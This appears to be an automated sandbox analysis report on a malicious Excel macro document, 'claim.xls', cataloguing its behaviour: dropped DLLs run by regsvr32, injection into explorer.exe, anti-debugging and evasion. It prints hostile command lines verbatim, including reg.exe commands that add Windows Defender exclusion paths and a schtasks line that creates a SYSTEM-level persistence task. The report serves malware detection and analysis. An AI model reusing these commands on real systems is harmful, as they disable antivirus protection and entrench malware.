Source: claim.xls OLE, VBA macro line: Private Sub saWorkbook_Opensa()
Source: claim.xls OLE, VBA macro line: m_openAlreadyRan = True
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000C6C0 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 5_2_1000C6C0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000CB77 memset,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 5_2_1000CB77
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
PE file does not import any functions
Source: Fiosa2.der.23.dr Static PE information: No import functions for PE file found
Source: Fiosa.der.6.dr Static PE information: No import functions for PE file found
Source: Fiosa1.der.13.dr Static PE information: No import functions for PE file found
Source: Fiosa.der.16.dr Static PE information: No import functions for PE file found
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0'
Document contains embedded VBA macros
Source: claim.xls OLE indicator, VBA macros: true
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: 44466.2404627315[1].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fiosa.der.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44466.2404627315[2].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fiosa1.der.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 44466.2404627315[3].dat.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Fiosa2.der.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ......................(..........&z.....(.P...............................................................................................(..... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................,...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........'.....N.......(............... Jump to behavior
Source: C:\Windows\System32\reg.exe Console Write: ................T...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........(.......N.......(............... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0'
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Orvzzr' /d '0'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa.der Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa1.der Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\Fiosa2.der Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.der Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00 Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.der Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.der Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Wsctwy' /d '0' Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Orvzzr' /d '0' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Application Data\Microsoft\Forms Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCCDF.tmp Jump to behavior
Source: classification engine Classification label: mal100.expl.evad.winXLS@33/11@0/3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000D523 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 5_2_1000D523
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: claim.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000ABA3 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 5_2_1000ABA3
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{13A70D02-D596-49D3-85D8-F794E715B0BB}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\{C87EDD02-7E1F-45D7-84EE-25BBD0EE0EFA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \BaseNamedObjects\Global\{13A70D02-D596-49D3-85D8-F794E715B0BB}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{1E547147-A808-494B-A26E-4EDF51CE11CC}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C87EDD02-7E1F-45D7-84EE-25BBD0EE0EFA}
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{1E547147-A808-494B-A26E-4EDF51CE11CC}
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000A51A FindResourceA, 5_2_1000A51A
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amstream.pdb source: explorer.exe, 00000006.00000003.475215539.0000000002701000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000003.530389514.0000000002811000.00000004.00000001.sdmp
Source: Binary string: c:\chart-Green\Vowel-list\Place\935\Day.pdb source: regsvr32.exe, 00000005.00000002.475053878.000000001002A000.00000002.00020000.sdmp, explorer.exe, 00000006.00000003.476401162.0000000002701000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000002.530135383.000000001002A000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.536158906.000000001002A000.00000002.00020000.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1002202C push es; ret 5_2_1002202D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10021C96 pushad ; iretd 5_2_10021C9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 5_2_10026CF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10026105 push edi; ret 5_2_1002611C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1002514B pushad ; iretd 5_2_1002514C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10027D58 pushfd ; ret 5_2_10027DEC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10027679 push es; ret 5_2_100276FB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10023B27 push es; retf 5_2_10023BA0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10022F6D push eax; retf 5_2_10022F97
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10022FAA push eax; retf 5_2_10022F97
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000EA00E push ebx; ret 6_2_000EA00F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000ED485 push FFFFFF8Ah; iretd 6_2_000ED50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000ED4B6 push FFFFFF8Ah; iretd 6_2_000ED50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E9D5C push cs; iretd 6_2_000E9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000E9E5E push cs; iretd 6_2_000E9E32
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000EBB29 push esi; iretd 6_2_000EBB2E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002202C push es; ret 9_2_1002202D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10021C96 pushad ; iretd 9_2_10021C9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 9_2_10026CF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10026105 push edi; ret 9_2_1002611C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002514B pushad ; iretd 9_2_1002514C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10027D58 pushfd ; ret 9_2_10027DEC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10027679 push es; ret 9_2_100276FB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10023B27 push es; retf 9_2_10023BA0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10022F6D push eax; retf 9_2_10022F97
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10022FAA push eax; retf 9_2_10022F97
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1002202C push es; ret 12_2_1002202D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10021C96 pushad ; iretd 12_2_10021C9E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10026CE9 push dword ptr [esp+eax*4+38h]; iretd 12_2_10026CF4
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_10026105 push edi; ret 12_2_1002611C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1002514B pushad ; iretd 12_2_1002514C
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 5_2_10012AEC
PE file contains an invalid checksum
Source: Fiosa2.der.23.dr Static PE information: real checksum: 0x7fed4 should be: 0x816c9
Source: Fiosa.der.6.dr Static PE information: real checksum: 0x7fed4 should be: 0x101479
Source: Fiosa1.der.13.dr Static PE information: real checksum: 0x7fed4 should be: 0x816c9
Source: Fiosa.der.16.dr Static PE information: real checksum: 0x7fed4 should be: 0x816c9

Persistence and Installation Behavior:

barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: reg.exe Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa1.der
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Fiosa2.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa2.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa.der Jump to dropped file
Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Fiosa1.der Jump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn hmgscuofc /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 05:48 /ET 06:00

Hooking and other Techniques for Hiding and Protection:

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 3044 base: 4F102D value: E9 BA 4C BE FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2308 base: 4F102D value: E9 BA 4C B9 FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 984 base: 4F102D value: E9 BA 4C C2 FF Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2964 base: 4F102D value: E9 BA 4C B9 FF Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: claim.xls Stream path 'Workbook' entropy: 7.94597570807 (max. 8.0)

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 840 Thread sleep count: 49 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 308 Thread sleep time: -148000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1960 Thread sleep count: 47 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2788 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 772 Thread sleep count: 61 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1232 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2524 Thread sleep count: 62 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2524 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 2568 Thread sleep count: 39 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[1].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[3].dat Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.2404627315[2].dat Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW, 5_2_1000D01F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW, 5_2_1000AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 6_2_000DAEB4 FindFirstFileW,FindNextFileW, 6_2_000DAEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 13_2_0008AEB4 FindFirstFileW,FindNextFileW, 13_2_0008AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 16_2_0011AEB4 FindFirstFileW,FindNextFileW, 16_2_0011AEB4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 23_2_0008AEB4 FindFirstFileW,FindNextFileW, 23_2_0008AEB4

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError, 5_2_10005F82
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress, 5_2_10012AEC
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10029660 GetProcessHeap,RtlAllocateHeap, 5_2_10029660
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1007792E mov eax, dword ptr fs:[00000030h] 5_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_1007785D mov eax, dword ptr fs:[00000030h] 5_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 5_2_10077464 push dword ptr fs:[00000030h] 5_2_10077464
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1007792E mov eax, dword ptr fs:[00000030h] 9_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1007785D mov eax, dword ptr fs:[00000030h] 9_2_1007785D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10077464 push dword ptr fs:[00000030h] 9_2_10077464
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1007792E mov eax, dword ptr fs:[00000030h] 12_2_1007792E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_1007785D mov eax, dword ptr fs:[00000030h] 12_2_1007785D
